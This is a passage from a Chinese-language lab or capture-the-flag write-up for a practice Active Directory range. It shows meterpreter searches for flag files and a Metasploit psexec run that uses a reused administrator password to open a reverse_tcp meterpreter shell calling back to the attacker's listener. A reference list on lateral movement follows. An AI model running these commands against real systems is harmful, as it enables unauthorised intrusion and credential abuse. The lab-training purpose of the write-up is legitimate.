10/14/2022 03:49 AM <DIR> Searches
10/14/2022 03:49 AM <DIR> Videos
1 File(s) 10 bytes
14 Dir(s) 124,500,250,624 bytes free
C:\Users\Administrator>exit
exit
meterpreter > search -f *adminflag*
Found 2 results...
==================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Administrator\adminflag.txt.txt 10 2022-10-15 11:09:24 -0400
c:\Users\administrator.CPENT\AppData\Roaming\Microsoft\Windows\Recent\adminflag.txt.lnk 859 2022-10-15 11:09:13 -0400
meterpreter > checksum md5 c:\\Users\\Administrator\\adminflag.txt.txt
f714934c963e839b03afe276cf9d3c18 c:\Users\Administrator\adminflag.txt.txt
這裡用meterpreter的指令search -f *字串*找到了跟題目不一樣的adminflag,*是wildcard的意思,也就是可以是任何字。可以看到後四位是3c18。內容是:
meterpreter > cat c:\Users\Administrator\adminflag.txt.txt
AD_2019-DC
Generate All Hashes - MD5, SHA1, SHA3, CRC32 - Online - Browserling Web Developer Tools
可以發現sha-256是09c5。
Challenge 11:
What is the contents of the adminflagBRAVO.txt at machine 172.25.170.70?
TODO: 如何爆破?
因為試過無法爆破,所以用以前爆破過的的smb帳密即可。
msf6 exploit(windows/smb/psexec) > set lport 6666
lport => 6666
msf6 exploit(windows/smb/psexec) > set rhosts 172.16.170.70
rhosts => 172.16.170.70
msf6 exploit(windows/smb/psexec) > set smbpass Pa$$w0rd123
smbpass => Pa$$w0rd123
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.170.70 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass Pa$$w0rd123 no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser administrator no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.200.7 yes The listen address (an interface may be specified)
LPORT 6666 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.200.7:6666
[*] 172.16.170.70:445 - Connecting to the server...
[*] 172.16.170.70:445 - Authenticating to 172.16.170.70:445 as user 'administrator'...
[*] 172.16.170.70:445 - Selecting PowerShell target
[*] 172.16.170.70:445 - Executing the payload...
[+] 172.16.170.70:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 172.16.170.70
[*] Meterpreter session 4 opened (192.168.200.7:6666 -> 172.16.170.70:61505) at 2023-04-02 02:28:11 -0400
meterpreter >
用跟上一題同樣的指令找flag,可以知道是SERVER2008-ADDC
meterpreter > search *adminflagBRAVO*
[-] You must specify a valid file glob to search for, e.g. >search -f *.doc
meterpreter > search -f *adminflagBRAVO*
Found 2 results...
==================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\administrator.CPENT\AppData\Roaming\Microsoft\Windows\Recent\adminflagBRAVO.lnk 2643 2022-10-15 11:03:27 -0400
c:\Users\administrator.CPENT\Documents\adminflagBRAVO.txt 15 2022-10-15 11:03:32 -0400
meterpreter > cat "c:\Users\administrator.CPENT\Documents\adminflagBRAVO.txt"
SERVER2008-ADDC
AD range結束。
Reference
SMB - OSCP Playbook
Offensive Security Cheatsheet
第九十三课:与CrackMapExec结合攻击 - Micro8
RCE on Windows from Linux Part 2: CrackMapExec - InfosecMatter
KSEC ARK - Pentesting and redteam knowledge base | CrackMapExec - Ultimate Guide
Freed0m/Readme.md at master · xidaner/Freed0m · GitHub
Tide安全团队——横向移动-WMI、SMB
動手寫 DAG_@FrankYang0529_https://static.coderbridge.com/images/covers/default-post-cover-1.jpg)
